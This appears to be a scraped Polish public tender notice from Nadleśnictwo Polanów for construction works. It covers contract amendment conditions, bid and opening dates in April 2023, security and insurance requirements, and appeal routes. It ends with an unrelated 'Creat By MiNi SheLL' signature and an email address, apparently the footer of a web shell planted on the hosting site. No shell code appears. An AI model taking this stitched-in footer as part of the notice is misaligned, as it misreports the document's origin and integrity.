https://portal.smartpzp.pl/nadlesnictwo.polanow<br/>1.Strony dopuszczają możliwość zmiany terminu zakończenia realizacji Przedmiotu Umowy, w następujących sytuacjach:<br/>1)jeżeli przyczyny, z powodu których będzie zagrożone dotrzymanie terminu wykonania robót budowlanych będą<br/>następstwem okoliczności, za które odpowiedzialność ponosi Zamawiający,<br/>2)gdy wystąpią niekorzystne warunki atmosferyczne uniemożliwiające prawidłowe wykonanie robót, w szczególności z<br/>powodu technologii realizacji prac określonej: Umową, normami lub innymi przepisami,<br/>3)gdy wystąpi konieczność wykonania robót zamiennych, dodatkowych lub innych robót niezbędnych do wykonania<br/>przedmiotu Umowy<br/>4)wystąpienia niebezpieczeństwa kolizji z planowanymi lub równolegle prowadzonymi przez inne podmioty inwestycjami<br/>5)jeżeli wystąpi brak możliwości wykonywania robót z powodu nie dopuszczania do ich wykonywania przez uprawniony<br/>organ lub nakazania ich wstrzymania przez uprawniony organ, z przyczyn niezależnych od Wykonawcy,<br/>6)wystąpienia Siły wyższej uniemożliwiającej wykonanie przedmiotu Umowy zgodnie z jej postanowieniami.<br/>7)wystąpienia przerw w realizacji robót budowlanych, powstałych z przyczyn zależnych od Zamawiającego,<br/>8)w przypadku przedłużającej się procedury udzielenia zamówienia publicznego o czas niezbędny do wykonania<br/>Przedmiotu Umowy,-<br/>2.Wykonawca jest uprawniony do wnioskowania o zmianę Umowy w zakresie materiałów, parametrów technicznych,<br/>technologii wykonania robót budowlanych, sposobu i zakresu wykonania przedmiotu Umowy w następujących sytuacjach:<br/>1)konieczności zrealizowania jakiejkolwiek części robót, objętej przedmiotem umowy, przy zastosowaniu odmiennych<br/>rozwiązań technicznych lub technologicznych, niż wskazane w OPZ i przedmiarze robót,<br/>2)wystąpienia warunków odbiegających w sposób istotny od przyjętych w dokumentacji projektowej, w OPZ i przedmiarze<br/>robót.<br/>3.Dopuszczalna jest zmiana Przedmiotu Umowy poprzez zmianę zakresu robót budowlanych przewidzianych do wykonania<br/>w ramach niniejszej Umowy w przypadku:<br/>1)konieczności wykonania robót zamiennych lub dodatkowych, których wykonanie ma na celu prawidłowe zrealizowanie<br/>Przedmiotu Umowy, a konieczność ich wykonania wynika z wad dokumentacji projektowej,<br/>2)konieczności wykonania robót zamiennych lub dodatkowych niezbędnych do prawidłowego wykonania Przedmiotu<br/>Umowy, które nie zostały przewidziane w dokumentacji projektowej przekazanej przez Zamawiającego,<br/>3)zmiany dokumentacji projektowej wykonane z inicjatywy Zamawiającego ze względu na stwierdzone wady,<br/>4)zmiany decyzji administracyjnych, na podstawie których prowadzone są roboty budowlane objęte Umową,<br/>4.Dopuszczalna jest zmiana Przedmiotu Umowy, w szczególności zmiana sposoby wykonania Przedmiotu Umowy, zakresu<br/>robót, lokalizacji robót w sytuacji:<br/>1)wystąpienia innych warunków geologicznych, geotechnicznych, hydrologicznych niż te wskazane przez Zamawiającego w<br/>dokumentacji projektowej, powodujących konieczność zmiany sposobu wykonania Przedmiotu Umowy;<br/>2)wystąpienia na terenie budowy niewybuchów, niewypałów, znalezisk archeologicznych lub innych niezinwentaryzowanych<br/>obiektów, które uniemożliwiają lub utrudniają wykonanie robót na warunkach przewidzianych w Umowie<br/>5.Dopuszczalna jest zmiana wysokości wynagrodzenia Wykonawcy w przypadku:<br/>1)konieczności wykonania robót dodatkowych, zamiennych lub innych nieprzewidzianych w dokumentacji projektowej, a<br/>których wykonanie jest konieczne albo w przypadku ograniczenia zakresu robót przewidzianych w Umowie,<br/>2)zmiany technologii wykonania robót lub materiałów zastosowanych do ich realizacji,<br/>3)spełnienia się innych okoliczności uprawniających do zmiany Umowy, o których mowa w niniejszym paragrafie Umowy,<br/>jeżeli mają one wpływ na wysokość wynagrodzenia. W takim wypadku zmiana wynagrodzenia jest dopuszczalna w zakresie,<br/>w jakim zmiany te mają wpływ na wysokość wynagrodzenia Wykonawcy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-04-18 09:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">za pośrednictwem platformy Portalu e-Usług SMARTPZP https://portal.smartpzp.pl/nadlesnictwo.polanow</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-04-18 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-05-17</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający wymaga wniesienia zabezpieczenia należytego wykonania umowy przez wykonawcę w wysokości 5%, którego oferta została uznana za najkorzystniejszą.<br/>Przed zawarciem umowy w sprawie zamówienia publicznego, Wykonawca, którego oferta została uznana za<br/>najkorzystniejszą zobowiązany jest dopełnić następujących formalności:<br/>1) wnieść wymagane zabezpieczanie należytego wykonania umowy;<br/>2) przedłożyć Zamawiającemu:<br/>a) polisę od odpowiedzialności cywilnej określoną w projekcie umowy stanowiącym załącznik nr 9 do SWZ w wysokości: 500 000,00 zł<br/>Pełny zakres informacji określa SWZ opublikowana na stronie internetowej prowadzonego postępowania, tj. dedykowana<br/>platforma zakupowa do obsługi komunikacji w formie elektronicznej pomiędzy Zamawiającym a wykonawcami oraz<br/>składania oferty: Portal e-Usług SMART PZP: https://portal.smartpzp.pl/nadlesnictwo.polanow .<br/>Wykonawcy, a także innemu podmiotowi, jeżeli ma lub miał interes w uzyskaniu zamówienia oraz poniósł lub może ponieść<br/>szkodę w wyniku naruszenia przez Zamawiającego przepisów PZP, przysługują środki ochrony prawnej określone w dziale<br/>IX PZP tj. odwołanie i skarga do sądu. Postępowanie odwoławcze uregulowane zostało w przepisach art. 506-578PZP, a<br/>postępowanie skargowe w przepisach art. 579-590 PZP.

Creat By MiNi SheLL
Email: jattceo@gmail.com